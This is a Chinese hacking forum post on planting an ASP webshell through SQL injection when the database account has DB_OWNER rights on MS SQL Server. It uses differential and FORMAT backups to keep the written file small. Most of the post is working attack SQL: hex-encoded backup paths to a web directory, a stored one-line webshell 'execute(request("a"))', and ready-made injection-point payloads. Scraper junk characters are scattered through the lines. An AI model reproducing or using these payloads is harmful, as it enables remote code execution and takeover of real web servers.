DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
6 k) }, J0 [( }4 I/ N4 ]
减少备份文件大小，得到可执行的webshell成功率提高不少
% m4 M: P! Z: c7 x( T7 W' _1 l一利用差异备份
加一个参数WITH DIFFERENTIAL

6 l" {! I' ~2 J; i3 @; h; Y+ ~1
. r0 @; y& A* I0 _1 O" c2
5 a# n# k0 ?. s8 Q* l3
4
6 `, Z4 i+ t0 Y" q/ I declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
7 f- F- q$ |+ udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
( w3 M* _* X' ?" X; n, W
二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
" {3 X+ ]! s0 q
1
9 a0 D' l$ V2 U6 v' Y) X2
- D2 z+ e- c' {, e+ _3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
; ^2 }7 `2 B3 n4 gcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
7 R/ j8 S$ q+ Z
9 i! b/ ~. c; S. l总的来说就是那么简单几句,下面以备份数据库model为例子
1

1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
4 X2 S6 X+ t/ S! l* x! [0 O  G" O
2
/ q2 |/ N; h, d+ v) J5 Z3 P6 B' r" f
' c; j3 ^; ]7 G( f: G! {7 D1
; ]! p# q  X. p2 f4 J5 W' z4 ~ id=1;backup database model to disk='你的路径‘ with differential,format;--